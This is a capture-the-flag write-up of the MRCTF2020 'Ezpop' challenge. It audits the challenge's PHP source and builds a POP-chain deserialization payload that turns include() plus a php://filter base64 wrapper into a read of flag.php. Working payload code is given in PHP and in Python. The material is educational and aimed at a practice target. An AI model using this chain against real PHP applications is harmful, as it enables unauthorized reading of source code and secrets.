[MRCTF2020]Ezpop 1
2022-07-27 08:11:00 【weixin_53150004】
Most of what is written about this challenge on the Internet is about the POP chain. Last week I started writing a fairly complete summary of PHP deserialization, which I expect to publish this week, so the analysis below is written as if I did not already know that material.
Opening the challenge link shows the source directly, so this is a straight code audit:
Check which PHP version the target runs first: several of the behaviours relied on below (for example how preg_match() handles an object argument) depend on the version.
```php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected $var;
    public function append($value){
        include($value);  // the sink: include() of a path we control
    }
    public function __invoke(){  // fires when the object is called as a function
        $this->append($this->var);  // step 4: reached from Test::__get, includes whatever $var holds
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){  // runs on `new Show`, NOT on unserialize()
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;  // step 2: if $str is a Test, reading ->source calls Test::__get
    }
    public function __wakeup(){  // runs right after unserialize() rebuilds the object
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            // step 1: preg_match() wants a string; if $source is a Show object its __toString runs
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
    public function __get($key){  // step 3: called when reading an inaccessible or undefined property
        $function = $this->p;
        return $function();  // if $p is a Modifier, calling it triggers Modifier::__invoke
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);  // entry point: attacker-controlled deserialization
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}
?>
```
The audit notes are inline as comments. Note that the string trigger is not the `echo` in `__construct`: constructors do not run during `unserialize()`. What converts the inner `Show` to a string is the `preg_match()` call in `__wakeup`, whose subject `$this->source` is passed in a string context.
Summarizing the chain after the audit:

unserialize() -> outer Show::__wakeup() -> preg_match() on $source, which is another Show -> inner Show::__toString() -> $this->str->source, where $str is a Test with no `source` property -> Test::__get() -> $this->p(), where $p is a Modifier -> Modifier::__invoke() -> include($this->var)

So the object graph we need is: an outer `Show` whose `source` is a second `Show`; the inner `Show`'s `str` is a `Test`; the `Test`'s `p` is a `Modifier`; the `Modifier`'s `var` is the thing to include. Including `flag.php` directly would just execute it and print nothing useful, so `var` is set to `php://filter/read=convert.base64-encode/resource=flag.php`, which makes `include()` output the file's source base64-encoded instead of running it. The `__wakeup` blacklist only inspects `Show::$source`, which in this chain holds an object (outer) or nothing (inner), so the wrapper string is never checked against it.
With that in mind, the payload:
```php
<?php
class Modifier {
    protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
class Show{
    public $source;
    public $str;
}
class Test{
    public $p;
}
$a = new Show();
$a->source = new Show();
$a->source->str = new Test();
$a->source->str->p = new Modifier();
echo urlencode(serialize($a));
?>
```
Why `urlencode`? `Modifier::$var` is protected, and PHP serializes a protected property name as `\0*\0var` (a private one as `\0ClassName\0name`). Those NUL bytes are invisible when the string is printed and are mangled when copied into a URL, so the serialized string is percent-encoded before being sent as the `pop` parameter.
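As an added example (not part of the original writeup, and not the challenge author's code), the same payload built without a PHP interpreter: a minimal hand-written PHP serializer in Python that reproduces `serialize()`'s object and string format, including the `\0*\0` mangling of the protected `Modifier::$var` that forces the urlencode step. It also mirrors the `__wakeup` regex so you can confirm that the `php://filter` wrapper would not match it even if it were checked, and decodes a constructed sample response. Everything is derived from the challenge source shown above; the sample response and the `pop=` query string are assumptions about how the result is used.

```python
import base64
import re
from urllib.parse import quote_plus

# include() of flag.php would execute it and print nothing useful, so read it
# through the base64 filter to get its source back as text.
FLAG_WRAPPER = "php://filter/read=convert.base64-encode/resource=flag.php"

# The /i regex from Show::__wakeup in the challenge source.
WAKEUP_BLACKLIST = re.compile(r"gopher|http|file|ftp|https|dict|\.\.", re.I)


def ser_string(s: str) -> str:
    """s:<len>:"<bytes>";  -- PHP counts bytes, not characters."""
    return f's:{len(s.encode())}:"{s}";'


def ser_null() -> str:
    return "N;"


def mangle_prop(name: str, visibility: str = "public", cls: str = "") -> str:
    """Property name exactly as PHP's serialize() writes it.

    public    -> name
    protected -> \\0*\\0name
    private   -> \\0ClassName\\0name
    The NUL bytes are why the raw payload cannot be pasted into a URL as-is.
    """
    if visibility == "public":
        return name
    if visibility == "protected":
        return f"\x00*\x00{name}"
    if visibility == "private":
        return f"\x00{cls}\x00{name}"
    raise ValueError(f"unknown visibility {visibility!r}")


def ser_object(cls: str, props: list[tuple[str, str]]) -> str:
    """O:<len>:"<Class>":<n>:{<mangled name><serialized value>...}"""
    body = "".join(ser_string(name) + value for name, value in props)
    return f'O:{len(cls.encode())}:"{cls}":{len(props)}:{{{body}}}'


def build_pop_chain(resource: str = FLAG_WRAPPER) -> str:
    """Show(source=Show(str=Test(p=Modifier(var=resource)))).

    unserialize -> outer Show::__wakeup -> preg_match on inner Show -> __toString
    -> $this->str->source on a Test -> Test::__get -> $p() -> Modifier::__invoke
    -> include($var)
    """
    modifier = ser_object("Modifier", [(mangle_prop("var", "protected"), ser_string(resource))])
    test = ser_object("Test", [("p", modifier)])
    inner_show = ser_object("Show", [("source", ser_null()), ("str", test)])
    return ser_object("Show", [("source", inner_show), ("str", ser_null())])


def wakeup_blocks(source_value: str) -> bool:
    """Would Show::__wakeup reset this string $source to index.php?"""
    return WAKEUP_BLACKLIST.search(source_value) is not None


def build_query(resource: str = FLAG_WRAPPER) -> str:
    """Percent-encode like PHP's urlencode() so the NUL bytes survive the GET."""
    return "pop=" + quote_plus(build_pop_chain(resource), safe="")


def decode_leaked_source(response_body: str) -> str:
    """The include() prints flag.php base64-encoded; decode it back to source."""
    return base64.b64decode(response_body.strip()).decode()


def sample_response() -> str:
    """Constructed stand-in for the real response body (assumption, not real data)."""
    return base64.b64encode(b"<?php\n$flag = 'flag{example}';\n").decode()


if __name__ == "__main__":
    print(repr(build_pop_chain()))   # the \x00*\x00var bytes are visible here
    print(build_query())             # append to index.php? and send
    print(decode_leaked_source(sample_response()))
```

`wakeup_blocks()` only models the string case; when `$source` is an object, as in this chain, `preg_match()` stringifies it and the `__toString` call is the whole point.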
Request the page with `?pop=<urlencoded payload>`. The response is the base64-encoded source of `flag.php`; base64-decode it to read the flag.
Summary
- You must be patient when auditing code